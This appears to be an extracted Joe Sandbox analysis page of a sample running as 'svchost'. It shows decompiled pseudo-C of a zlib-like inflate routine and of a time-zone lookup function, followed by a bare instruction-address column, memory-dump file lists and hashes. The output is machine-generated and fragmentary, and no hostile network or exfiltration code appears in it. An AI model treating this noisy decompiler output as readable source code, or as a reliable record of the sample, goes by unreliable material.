    												__ecx =  *(0x4b83a0 +  *(__esp + 0x1c) * 4) & __edi;
    												__eax = __eax + ( *(0x4b83a0 +  *(__esp + 0x1c) * 4) & __edi);
    												__ecx =  *(__esp + 0x1c);
    												__edi = __edi >> __cl;
    												__ecx =  *(__esp + 0x1c) + __edx;
    												 *(__esp + 0x18) = __eax;
    												__ebp = __ebp -  *(__esp + 0x1c) + __edx;
    												__ecx = __ebx[2];
    												 *(__esp + 0x1c) = __ebx[2];
    												__ecx = __ebx[1];
    												__edx = __ecx;
    												__ecx = __ecx & 0x0000001f;
    												__edx = __edx >> 5;
    												__edx = __edx & 0x0000001f;
    												_t185 = __ecx + 0x102; // 0x102
    												__ecx = __edx + _t185;
    												__edx =  *(__esp + 0x1c);
    												__eax = __eax + __edx;
    												__eflags = __eax - __ecx;
    												if(__eax > __ecx) {
    													L111:
    													__edx = __ebx[3];
    													__eax =  *(__esi + 0x28);
    													_push(__ebx[3]);
    													_push( *(__esi + 0x28));
    													__eax =  *((intOrPtr*)(__esi + 0x24))();
    													__eax =  *(__esp + 0x18);
    													__ecx =  *(__esp + 0x1c);
    													 *__ebx = 9;
    													 *(__esi + 0x18) = "invalid bit length repeat";
    													__ebx[8] = __edi;
    													__ebx[7] = __ebp;
    													__edi =  *__esi;
    													__edx = __eax;
    													 *(__esi + 4) =  *(__esp + 0x1c);
    													__ecx =  *(__esi + 8);
    													__edx = __eax -  *__esi;
    													 *__esi = __eax;
    													__eax =  *(__esp + 0x4c);
    													__ecx =  *(__esi + 8) + __edx;
    													__eflags = __ecx;
    													 *(__esi + 8) = __ecx;
    													__ebx[0xd] =  *(__esp + 0x4c);
    													__eax = E00467F40(__ebx, __esi, 0xfffffffd);
    													_pop(__edi);
    													_pop(__esi);
    													return __eax;
    												} else {
    													__eflags =  *(__esp + 0x34) - 0x10;
    													if( *(__esp + 0x34) != 0x10) {
    														__eax =  *(__esp + 0x1c);
    														__ecx = 0;
    														__eflags = 0;
    														goto L86;
    													} else {
    														__eax = __edx;
    														__eflags = __eax - 1;
    														if(__eax < 1) {
    															goto L111;
    														} else {
    															__ecx = __ebx[3];
    															__ecx =  *(__ebx[3] + __eax * 4 - 4);
    															do {
    																L86:
    																__edx = __ebx[3];
    																__eax = __eax + 1;
    																 *(__ebx[3] + __eax * 4 - 4) = __ecx;
    																__edx =  *(__esp + 0x18);
    																__edx =  *(__esp + 0x18) - 1;
    																__eflags = __edx;
    																 *(__esp + 0x18) = __edx;
    															} while (__edx != 0);
    															goto L87;
    														}
    													}
    												}
    											} else {
    												while(1) {
    													__ecx =  *(__esp + 0x14);
    													__eflags = __ecx;
    													if(__ecx == 0) {
    														goto L110;
    													}
    													__edx = __ecx;
    													__ecx = 0;
    													__edx = __edx - 1;
    													 *(__esp + 0x4c) = 0;
    													 *(__esp + 0x14) = __edx;
    													__edx =  *(__esp + 0x10);
    													__cl =  *( *(__esp + 0x10));
    													__edx = 0;
    													__ecx = __ebp;
    													__edx = 0 << __cl;
    													__ecx =  *(__esp + 0x10);
    													__ebp = 8 + __ebp;
    													__edi = __edi | 0 << __cl;
    													__ecx =  *(__esp + 0x10) + 1;
    													 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
    													__ecx =  *(__esp + 0x20);
    													__eflags = __ebp -  *(__esp + 0x20);
    													if(__ebp <  *(__esp + 0x20)) {
    														continue;
    													} else {
    														__edx =  *(__esp + 0x18);
    														goto L81;
    													}
    													goto L127;
    												}
    												goto L110;
    											}
    										} else {
    											__ecx = 0;
    											__ebp = __ebp;
    											__edx = __ebx[3];
    											__edi = __edi >> __cl;
    											__ecx = __ebx[2];
    											 *(__ebx[3] + __ebx[2] * 4) = __eax;
    											__eax = __ebx[2];
    											__eax = __ebx[2] + 1;
    											goto L87;
    										}
    									} else {
    										while(1) {
    											__ecx =  *(__esp + 0x14);
    											__eflags = __ecx;
    											if(__ecx == 0) {
    												break;
    											}
    											__edx = __ecx;
    											__ecx = 0;
    											__edx = __edx - 1;
    											 *(__esp + 0x4c) = 0;
    											 *(__esp + 0x14) = __edx;
    											__edx =  *(__esp + 0x10);
    											__cl =  *( *(__esp + 0x10));
    											__edx = 0;
    											__ecx = __ebp;
    											__edx = 0 << __cl;
    											__ecx =  *(__esp + 0x10);
    											__ebp = 8 + __ebp;
    											__edi = __edi | 0 << __cl;
    											__ecx =  *(__esp + 0x10) + 1;
    											__eflags = __ebp - __eax;
    											 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
    											if(__ebp < __eax) {
    												continue;
    											} else {
    												goto L73;
    											}
    											goto L127;
    										}
    										L110:
    										__eax =  *(__esp + 0x10);
    										__ebx[8] = __edi;
    										__ebx[7] = __ebp;
    										__edi =  *__esi;
    										__ecx =  *(__esi + 8);
    										__edx = __eax;
    										__edx = __eax -  *__esi;
    										 *__esi = __eax;
    										__eax =  *(__esp + 0x44);
    										__ecx =  *(__esi + 8) + __edx;
    										__eflags = __ecx;
    										 *(__esi + 8) = __ecx;
    										__ecx =  *(__esp + 0x4c);
    										 *(__esi + 4) = 0;
    										__ebx[0xd] =  *(__esp + 0x44);
    										__eax = E00467F40(__ebx, __esi,  *(__esp + 0x4c));
    										_pop(__edi);
    										_pop(__esi);
    										return __eax;
    									}
    									goto L127;
    									L87:
    									__ebx[2] = __eax;
    									__eax = __ebx[1];
    									__ecx = __ebx[2];
    									__eax = __eax >> 5;
    									__edx = __eax >> 0x00000005 & 0x0000001f;
    									_t203 = __eax + 0x102; // 0x102
    									__eax = __edx + _t203;
    									__eflags = __ebx[2] - __edx + _t203;
    								} while (__ebx[2] < __edx + _t203);
    								goto L88;
    							}
    							goto L127;
    						case 6:
    							__edi =  *(__esp + 0x18);
    							__esi =  *(__esp + 0x48);
    							L92:
    							__eax =  *(__esp + 0x10);
    							__edx =  *(__esp + 0x14);
    							__ebx[8] = __edi;
    							__ebx[7] = __ebp;
    							__edi =  *__esi;
    							__ecx = __eax;
    							 *(__esi + 4) =  *(__esp + 0x14);
    							__edx =  *(__esi + 8);
    							__ecx = __eax -  *__esi;
    							 *__esi = __eax;
    							__eax =  *(__esp + 0x4c);
    							__edx =  *(__esi + 8) + __ecx;
    							 *(__esi + 8) =  *(__esi + 8) + __ecx;
    							__edx =  *(__esp + 0x44);
    							_push( *(__esp + 0x4c));
    							_push(__esi);
    							_push(__ebx);
    							__ebx[0xd] = __edx;
    							__eax = E00467500();
    							__esp = __esp + 0xc;
    							__eflags = __eax - 1;
    							if(__eax != 1) {
    								goto L121;
    							} else {
    								__ecx = __ebx[1];
    								 *(__esp + 0x54) = 0;
    								E00467CB0(__ebx[1], __esi) = __ebx[8];
    								__ecx = __ebx[0xd];
    								__edi =  *__esi;
    								__edx =  *(__esi + 4);
    								__ebp = __ebx[7];
    								 *(__esp + 0x20) = __ebx[8];
    								__eax = __ebx[0xc];
    								__eflags = __ecx - __eax;
    								 *(__esp + 0x10) = __edi;
    								 *(__esp + 0x14) =  *(__esi + 4);
    								 *(__esp + 0x44) = __ecx;
    								if(__ecx >= __eax) {
    									__eax = __ebx[0xb];
    									__eax = __ebx[0xb] - __ecx;
    									__eflags = __eax;
    								} else {
    									__eax = __eax - __ecx;
    									__eax = __eax - 1;
    								}
    								 *(__esp + 0x1c) = __eax;
    								__eax = __ebx[6];
    								__eflags = __ebx[6];
    								if(__ebx[6] != 0) {
    									 *__ebx = 7;
    									goto L119;
    								} else {
    									 *__ebx = 0;
    									goto L4;
    								}
    							}
    							goto L127;
    						case 7:
    							__ecx =  *(__esp + 0x44);
    							__edi =  *(__esp + 0x10);
    							__esi =  *(__esp + 0x48);
    							L119:
    							__eax =  *(__esp + 0x4c);
    							__ebx[0xd] = __ecx;
    							__eax = E00467F40(__ebx, __esi,  *(__esp + 0x4c));
    							__ecx = __ebx[0xd];
    							__edx = __ebx[0xc];
    							__eflags = __ebx[0xc] - __ecx;
    							if(__ebx[0xc] == __ecx) {
    								 *__ebx = 8;
    								goto L124;
    							} else {
    								__edx =  *(__esp + 0x18);
    								__ebx[7] = __ebp;
    								__ebx[8] =  *(__esp + 0x18);
    								__edx =  *(__esp + 0x14);
    								__ebp =  *__esi;
    								 *(__esi + 4) =  *(__esp + 0x14);
    								__edx = __edi;
    								 *__esi = __edi;
    								__edx = __edi -  *__esi;
    								__ebp =  *(__esi + 8);
    								__ebp =  *(__esi + 8) + __edi -  *__esi;
    								__eflags = __ebp;
    								 *(__esi + 8) = __ebp;
    								__ebx[0xd] = __ecx;
    								L121:
    								__eax = E00467F40(__ebx, __esi, __eax);
    								_pop(__edi);
    								_pop(__esi);
    								return __eax;
    							}
    							goto L127;
    						case 8:
    							__ecx =  *(__esp + 0x44);
    							__edi =  *(__esp + 0x10);
    							__esi =  *(__esp + 0x48);
    							L124:
    							__eax =  *(__esp + 0x18);
    							__edx =  *(__esp + 0x14);
    							__ebx[8] =  *(__esp + 0x18);
    							__ebx[7] = __ebp;
    							__ebp =  *__esi;
    							__eax = __edi;
    							 *(__esi + 4) =  *(__esp + 0x14);
    							__edx =  *(__esi + 8);
    							__eax = __edi -  *__esi;
    							__edx =  *(__esi + 8) + __edi -  *__esi;
    							__eflags = __edx;
    							 *(__esi + 8) = __edx;
    							 *__esi = __edi;
    							__ebx[0xd] = __ecx;
    							__eax = E00467F40(__ebx, __esi, 1);
    							_pop(__edi);
    							_pop(__esi);
    							return __eax;
    							goto L127;
    						case 9:
    							__ecx =  *(__esp + 0x18);
    							__eax =  *(__esp + 0x48);
    							__edx =  *(__esp + 0x14);
    							__ebx[8] =  *(__esp + 0x18);
    							__ecx =  *(__esp + 0x10);
    							__ebx[7] = __ebp;
    							__esi =  *__eax;
    							__ebp =  *(__eax + 8);
    							 *(__eax + 4) =  *(__esp + 0x14);
    							__edx = __ecx;
    							__edx = __ecx -  *__eax;
    							 *__eax = __ecx;
    							__ecx =  *(__esp + 0x44);
    							__ebp = __edx +  *(__eax + 8);
    							__eflags = __ebp;
    							 *(__eax + 8) = __ebp;
    							__ebx[0xd] =  *(__esp + 0x44);
    							__eax = E00467F40(__ebx, __eax, 0xfffffffd);
    							_pop(__edi);
    							_pop(__esi);
    							return __eax;
    							goto L127;
    						case 0xa:
    							L14:
    							_t504 = _t501 - 3;
    							 *_t465 = 1;
    							_t480 = _t504 & 0x00000007;
    							_t501 = _t504 - _t480;
    							 *(_t507 + 0x18) = _t497 >> 3 >> _t480;
    							goto L4;
    						case 0xb:
    							L15:
    							__edx =  *(__esp + 0x48);
    							__eax = __esp + 0x24;
    							_push( *(__esp + 0x48));
    							__ecx = __esp + 0x2c;
    							__edx = __esp + 0x34;
    							__esp + 0x3c = E00467F10(__esp + 0x3c, __esp + 0x34, __esp + 0x2c, __eax);
    							__ecx =  *(__esp + 0x5c);
    							__edx =  *(__esp + 0x38);
    							__eax =  *(__esp + 0x3c);
    							__ecx =  *(__esp + 0x44);
    							__eax = E0045F990( *(__esp + 0x4c),  *(__esp + 0x44),  *(__esp + 0x3c),  *(__esp + 0x4c),  *(__esp + 0x5c));
    							__ebx[1] = __eax;
    							__eflags = __eax;
    							if(__eax == 0) {
    								__eax =  *(__esp + 0x48);
    								__edx =  *(__esp + 0x14);
    								__ebx[8] = __esi;
    								__ebx[7] = __ebp;
    								__ebp =  *(__eax + 8);
    								 *(__eax + 4) =  *(__esp + 0x14);
    								__edx =  *__eax;
    								__edi = __edi -  *__eax;
    								__edx =  *(__esp + 0x44);
    								__ebp = __edi -  *__eax +  *(__eax + 8);
    								__eflags = __ebp;
    								 *(__eax + 8) = __ebp;
    								 *__eax = __edi;
    								__ebx[0xd] =  *(__esp + 0x44);
    								__eax = E00467F40(__ebx, __eax, 0xfffffffc);
    								_pop(__edi);
    								_pop(__esi);
    								return __eax;
    							} else {
    								__esi = __esi >> 3;
    								 *(__esp + 0x18) = __esi;
    								__ebp = __ebp - 3;
    								 *__ebx = 6;
    								goto L4;
    							}
    							goto L127;
    						case 0xc:
    							L17:
    							__esi = __esi >> 3;
    							 *(__esp + 0x18) = __esi;
    							__ebp = __ebp - 3;
    							 *__ebx = 3;
    							goto L4;
    						case 0xd:
    							L100:
    							__eax =  *(__esp + 0x48);
    							__ecx =  *(__esp + 0x14);
    							 *__ebx = 9;
    							__ebp = __ebp + 0xfffffffd;
    							__esi = __esi >> 3;
    							 *(__eax + 0x18) = "invalid block type";
    							__ebx[8] = __esi;
    							__ebx[7] = __ebp;
    							__ebp =  *(__eax + 8);
    							 *(__eax + 4) =  *(__esp + 0x14);
    							__ecx =  *__eax;
    							__edi = __edi -  *__eax;
    							__ecx =  *(__esp + 0x48);
    							__ebp = __edi -  *__eax +  *(__eax + 8);
    							__eflags = __ebp;
    							 *(__eax + 8) = __ebp;
    							 *__eax = __edi;
    							__ebx[0xd] =  *(__esp + 0x48);
    							__eax = E00467F40(__ebx, __eax, 0xfffffffd);
    							_pop(__edi);
    							_pop(__esi);
    							return __eax;
    							L127:
    					}
    				}
    				_t456 =  *(_t507 + 0x48);
    				_t465[8] =  *(_t507 + 0x18);
    				_t465[7] = _t501;
    				 *(4 + _t456) =  *(_t507 + 0x14);
    				_t469 =  *(_t507 + 0x10);
    				 *_t456 = _t469;
    				_t503 =  *(8 + _t456) + _t469 -  *_t456;
    				 *(8 + _t456) = _t503;
    				_t465[0xd] =  *(_t507 + 0x48);
    				return E00467F40(_t465, _t456, 0xfffffffe);
    				goto L127;
    			}

[Instruction address column of the disassembly view for this function (addresses from 0x00466803 up to 0x0046720f, with 0x00000000 entries for unresolved targets); the instruction text beside each address is not present in the extracted page.]
    0x00466ba6
    0x00466ba9
    0x00466bab
    0x00466c1b
    0x00466c1b
    0x00466c1e
    0x00466c23
    0x00466c25
    0x00466c27
    0x00466c27
    0x00466c2a
    0x00466c31
    0x00466c34
    0x00466c3b
    0x00466c3e
    0x00466c3f
    0x00466c41
    0x00466c44
    0x00466c44
    0x00466c27
    0x00466c48
    0x00466c4c
    0x00466c4f
    0x00466c53
    0x00466c59
    0x00466c5f
    0x00466c67
    0x00466c6b
    0x00466c6d
    0x0046724f
    0x00467252
    0x00467255
    0x00467256
    0x00467257
    0x0046725a
    0x0046725e
    0x00467261
    0x00000000
    0x00466c73
    0x00466c73
    0x00466c76
    0x00000000
    0x00466c76
    0x00466bad
    0x00466bad
    0x00466bad
    0x00466bb0
    0x00000000
    0x00466bb2
    0x00466bb2
    0x00466bb6
    0x00466bb6
    0x00466bba
    0x00466bbc
    0x00000000
    0x00000000
    0x00466bc2
    0x00466bc4
    0x00466bc6
    0x00466bc9
    0x00466bcd
    0x00466bcf
    0x00466bd1
    0x00466bd4
    0x00466bd6
    0x00466bde
    0x00466be0
    0x00466be1
    0x00466be4
    0x00466be8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466be8
    0x00467210
    0x00467214
    0x00467217
    0x0046721a
    0x0046721c
    0x0046721f
    0x00467221
    0x00467223
    0x00467225
    0x00467229
    0x00467229
    0x0046722b
    0x0046722e
    0x00467234
    0x0046723c
    0x0046723f
    0x00467247
    0x00467248
    0x0046724e
    0x0046724e
    0x00000000
    0x00466bea
    0x00466bea
    0x00466bed
    0x00466bef
    0x00466bf2
    0x00466bf5
    0x00466bfc
    0x00466bff
    0x00466c02
    0x00466c05
    0x00466c08
    0x00466c09
    0x00466c0c
    0x00466c11
    0x00466c14
    0x00466c17
    0x00466c17
    0x00000000
    0x00466bad
    0x00000000
    0x00000000
    0x00466c7e
    0x00466c82
    0x00466c86
    0x00466c86
    0x00466c89
    0x00466c8c
    0x00466c8e
    0x00466c91
    0x00466c94
    0x00466c97
    0x00466c97
    0x00466c9e
    0x00466ca0
    0x00466e31
    0x00466e31
    0x00466e34
    0x00466e39
    0x00466e3d
    0x00466e43
    0x00466e47
    0x00466e4c
    0x00466e52
    0x00466e55
    0x00466e58
    0x00466e5b
    0x00466e5d
    0x00466e64
    0x00466e6b
    0x00466e73
    0x00466e7b
    0x00466e80
    0x00466e83
    0x00466e87
    0x00466e8a
    0x00466e8b
    0x00466e8c
    0x00466e8f
    0x00466e93
    0x00466e96
    0x00466e98
    0x004672fc
    0x00467301
    0x00467301
    0x00467303
    0x00467303
    0x00467309
    0x0046730d
    0x00467311
    0x00467314
    0x00467317
    0x00467319
    0x0046731b
    0x0046731e
    0x00467321
    0x00467323
    0x00467325
    0x00467329
    0x00467329
    0x0046732b
    0x0046732e
    0x00467335
    0x00467338
    0x00467340
    0x00467341
    0x00467347
    0x00466e9e
    0x00466e9e
    0x00466ea2
    0x00466ea6
    0x00466eb3
    0x00466ebb
    0x00466ebd
    0x00467348
    0x0046734c
    0x00467350
    0x00467353
    0x00467356
    0x00467358
    0x0046735a
    0x0046735d
    0x00467360
    0x00467364
    0x00467364
    0x00467367
    0x0046736a
    0x0046736e
    0x00467371
    0x00467374
    0x0046737c
    0x0046737d
    0x00467383
    0x00466ec3
    0x00466ec3
    0x00466ec6
    0x00000000
    0x00466ec6
    0x00466ebd
    0x00466ca6
    0x00466ca6
    0x00466ca6
    0x00466ca9
    0x00466cab
    0x00466ce8
    0x00466ce8
    0x00466cef
    0x00466cf2
    0x00466cf4
    0x00466cfa
    0x00466cfd
    0x00466d01
    0x00466d04
    0x00466d07
    0x00466d0b
    0x00466d25
    0x00466d28
    0x00466d2d
    0x00466d2f
    0x00466d2f
    0x00466d2f
    0x00466d32
    0x00466d35
    0x00466d39
    0x00466d3b
    0x00466d3d
    0x00466d3f
    0x00466d41
    0x00466d45
    0x00466d48
    0x00466d4a
    0x00466d8f
    0x00466d8f
    0x00466d91
    0x00466d93
    0x00466d97
    0x00466d9e
    0x00466da0
    0x00466da2
    0x00466da6
    0x00466da8
    0x00466daa
    0x00466dae
    0x00466db0
    0x00466db3
    0x00466db7
    0x00466dba
    0x00466dbc
    0x00466dbf
    0x00466dc2
    0x00466dc5
    0x00466dc5
    0x00466dcc
    0x00466dd0
    0x00466dd2
    0x00466dd4
    0x004672a8
    0x004672a8
    0x004672ab
    0x004672ae
    0x004672af
    0x004672b0
    0x004672b3
    0x004672b7
    0x004672bb
    0x004672c1
    0x004672c8
    0x004672cb
    0x004672ce
    0x004672d0
    0x004672d2
    0x004672d5
    0x004672d8
    0x004672da
    0x004672dc
    0x004672e0
    0x004672e0
    0x004672e5
    0x004672e9
    0x004672ec
    0x004672f4
    0x004672f5
    0x004672fb
    0x00466dda
    0x00466dda
    0x00466ddf
    0x00466df5
    0x00466df9
    0x00466df9
    0x00000000
    0x00466de1
    0x00466de1
    0x00466de3
    0x00466de6
    0x00000000
    0x00466dec
    0x00466dec
    0x00466def
    0x00466dfb
    0x00466dfb
    0x00466dfb
    0x00466dfe
    0x00466dff
    0x00466e03
    0x00466e07
    0x00466e07
    0x00466e08
    0x00466e08
    0x00000000
    0x00466dfb
    0x00466de6
    0x00466ddf
    0x00466d4c
    0x00466d4c
    0x00466d4c
    0x00466d50
    0x00466d52
    0x00000000
    0x00000000
    0x00466d58
    0x00466d5a
    0x00466d5c
    0x00466d5d
    0x00466d65
    0x00466d69
    0x00466d6d
    0x00466d6f
    0x00466d71
    0x00466d73
    0x00466d75
    0x00466d79
    0x00466d7c
    0x00466d7e
    0x00466d7f
    0x00466d83
    0x00466d87
    0x00466d89
    0x00000000
    0x00466d8b
    0x00466d8b
    0x00000000
    0x00466d8b
    0x00000000
    0x00466d89
    0x00000000
    0x00466d4c
    0x00466d0d
    0x00466d0d
    0x00466d0f
    0x00466d11
    0x00466d14
    0x00466d16
    0x00466d19
    0x00466d1c
    0x00466d1f
    0x00000000
    0x00466d1f
    0x00466cad
    0x00466cad
    0x00466cad
    0x00466cb1
    0x00466cb3
    0x00000000
    0x00000000
    0x00466cb9
    0x00466cbb
    0x00466cbd
    0x00466cbe
    0x00466cc6
    0x00466cca
    0x00466cce
    0x00466cd0
    0x00466cd2
    0x00466cd4
    0x00466cd6
    0x00466cda
    0x00466cdd
    0x00466cdf
    0x00466ce0
    0x00466ce2
    0x00466ce6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00466ce6
    0x00467269
    0x00467269
    0x0046726d
    0x00467270
    0x00467273
    0x00467275
    0x00467278
    0x0046727a
    0x0046727c
    0x0046727e
    0x00467282
    0x00467282
    0x00467284
    0x00467287
    0x0046728d
    0x00467295
    0x00467298
    0x004672a0
    0x004672a1
    0x004672a7
    0x004672a7
    0x00000000
    0x00466e0e
    0x00466e0e
    0x00466e11
    0x00466e14
    0x00466e19
    0x00466e1c
    0x00466e22
    0x00466e22
    0x00466e29
    0x00466e29
    0x00000000
    0x00466ca6
    0x00000000
    0x00000000
    0x00466ece
    0x00466ed2
    0x00466ed6
    0x00466ed6
    0x00466eda
    0x00466ede
    0x00466ee1
    0x00466ee4
    0x00466ee6
    0x00466ee8
    0x00466eeb
    0x00466eee
    0x00466ef0
    0x00466ef2
    0x00466ef6
    0x00466ef8
    0x00466efb
    0x00466eff
    0x00466f00
    0x00466f01
    0x00466f02
    0x00466f05
    0x00466f0a
    0x00466f0d
    0x00466f10
    0x00000000
    0x00466f16
    0x00466f16
    0x00466f1b
    0x00466f28
    0x00466f2b
    0x00466f2e
    0x00466f30
    0x00466f33
    0x00466f36
    0x00466f3a
    0x00466f40
    0x00466f42
    0x00466f46
    0x00466f4a
    0x00466f4e
    0x00466f55
    0x00466f58
    0x00466f58
    0x00466f50
    0x00466f50
    0x00466f52
    0x00466f52
    0x00466f5a
    0x00466f5e
    0x00466f61
    0x00466f63
    0x00467384
    0x00000000
    0x00466f69
    0x00466f69
    0x00000000
    0x00466f69
    0x00466f63
    0x00000000
    0x00000000
    0x0046738c
    0x00467390
    0x00467394
    0x00467398
    0x00467398
    0x0046739c
    0x004673a2
    0x004673a7
    0x004673aa
    0x004673b0
    0x004673b2
    0x004673eb
    0x00000000
    0x004673b4
    0x004673b4
    0x004673b8
    0x004673bb
    0x004673be
    0x004673c2
    0x004673c4
    0x004673c7
    0x004673c9
    0x004673cb
    0x004673cd
    0x004673d0
    0x004673d0
    0x004673d2
    0x004673d5
    0x004673d8
    0x004673db
    0x004673e3
    0x004673e4
    0x004673ea
    0x004673ea
    0x00000000
    0x00000000
    0x004673f3
    0x004673f7
    0x004673fb
    0x004673ff
    0x004673ff
    0x00467403
    0x00467407
    0x0046740a
    0x0046740d
    0x0046740f
    0x00467411
    0x00467414
    0x00467417
    0x0046741b
    0x0046741b
    0x0046741e
    0x00467421
    0x00467424
    0x00467427
    0x0046742f
    0x00467430
    0x00467436
    0x00000000
    0x00000000
    0x00467437
    0x0046743b
    0x0046743f
    0x00467443
    0x00467446
    0x0046744a
    0x0046744d
    0x0046744f
    0x00467452
    0x00467455
    0x00467457
    0x00467459
    0x0046745b
    0x0046745f
    0x0046745f
    0x00467464
    0x00467468
    0x0046746b
    0x00467473
    0x00467474
    0x0046747a
    0x00000000
    0x00000000
    0x004668b8
    0x004668b8
    0x004668bb
    0x004668c3
    0x004668cb
    0x004668cd
    0x00000000
    0x00000000
    0x004668d6
    0x004668d6
    0x004668da
    0x004668de
    0x004668df
    0x004668e4
    0x004668ef
    0x004668f4
    0x004668f8
    0x004668fc
    0x00466901
    0x0046690d
    0x00466915
    0x00466918
    0x0046691a
    0x00466fb3
    0x00466fb7
    0x00466fbb
    0x00466fbe
    0x00466fc1
    0x00466fc4
    0x00466fc7
    0x00466fcb
    0x00466fcd
    0x00466fd1
    0x00466fd1
    0x00466fd6
    0x00466fd9
    0x00466fdc
    0x00466fdf
    0x00466fe7
    0x00466fe8
    0x00466fee
    0x00466920
    0x00466920
    0x00466923
    0x00466927
    0x0046692a
    0x00000000
    0x0046692a
    0x00000000
    0x00000000
    0x00466935
    0x00466935
    0x00466938
    0x0046693c
    0x0046693f
    0x00000000
    0x00000000
    0x00466fef
    0x00466fef
    0x00466ff3
    0x00466ff7
    0x00466ffd
    0x00467000
    0x00467003
    0x0046700a
    0x0046700d
    0x00467010
    0x00467013
    0x00467016
    0x0046701c
    0x0046701e
    0x00467022
    0x00467022
    0x00467025
    0x00467028
    0x0046702b
    0x0046702e
    0x00467036
    0x00467037
    0x0046703d
    0x00000000
    0x00000000
    0x0046684d
    0x0046747f
    0x00467487
    0x0046748a
    0x00467492
    0x00467495
    0x0046749d
    0x004674a5
    0x004674a8
    0x004674ac
    0x004674be
    0x00000000

    Strings
    • invalid bit length repeat, xrefs: 004672C1
    • invalid stored block lengths, xrefs: 00467087
    • too many length or distance symbols, xrefs: 004671D3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: invalid bit length repeat$invalid stored block lengths$too many length or distance symbols
    • API String ID: 0-949635641
    • Opcode ID: 4ed951b0de808db15d77643e92f994a85edc3b1f7fe2011e236e8778389e7139
    • Instruction ID: b1f58426f0a7f1efd00ac7b274d6638edc86d49f3a9b307181d52ea16562f27b
    • Opcode Fuzzy Hash: 4ed951b0de808db15d77643e92f994a85edc3b1f7fe2011e236e8778389e7139
    • Instruction Fuzzy Hash: BD9270B56083018FCB08CF19D98052ABBE5FFC9314F14896EE899CB359E735E845CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00472C10(void* __edi, void* __esi, intOrPtr* _a4) {
    				struct _SYSTEMTIME _v20;
    				struct _SYSTEMTIME _v36;
    				short _v54;
    				struct _TIME_ZONE_INFORMATION _v208;
    				signed int _t23;
    				signed int _t24;
    				intOrPtr _t31;
    				intOrPtr* _t36;
    				void* _t37;
    				void* _t39;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    				void* _t46;
    				void* _t47;
    
    				_t39 = __esi;
    				_t37 = __edi;
    				GetLocalTime( &_v20);
    				GetSystemTime( &_v36);
    				_t43 = _v36.wMinute -  *0x4e17ea; // 0x0
    				if(_t43 != 0) {
    					L6:
    					_t23 = GetTimeZoneInformation( &_v208);
    					if(_t23 == 0xffffffff) {
    						_t24 = _t23 | 0xffffffff;
    					} else {
    						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
    							_t24 = 0;
    						} else {
    							_t24 = 1;
    						}
    					}
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_t37 = _t37;
    					 *0x4e17d8 = _t24;
    					_t39 = _t39;
    					L14:
    					_t31 = E0047BFD2(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
    					_t36 = _a4;
    					if(_t36 == 0) {
    						return _t31;
    					}
    					 *_t36 = _t31;
    					return _t31;
    				}
    				_t44 = _v36.wHour -  *0x4e17e8; // 0x0
    				if(_t44 != 0) {
    					goto L6;
    				}
    				_t45 = _v36.wDay -  *0x4e17e6; // 0x0
    				if(_t45 != 0) {
    					goto L6;
    				}
    				_t46 = _v36.wMonth -  *0x4e17e2; // 0x0
    				if(_t46 != 0) {
    					goto L6;
    				}
    				_t47 = _v36.wYear -  *0x4e17e0; // 0x0
    				if(_t47 != 0) {
    					goto L6;
    				}
    				_t24 =  *0x4e17d8; // 0x0
    				goto L14;
    			}

    APIs
    • GetLocalTime.KERNEL32(?), ref: 00472C1D
    • GetSystemTime.KERNEL32(?), ref: 00472C27
    • GetTimeZoneInformation.KERNEL32(?), ref: 00472C7C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
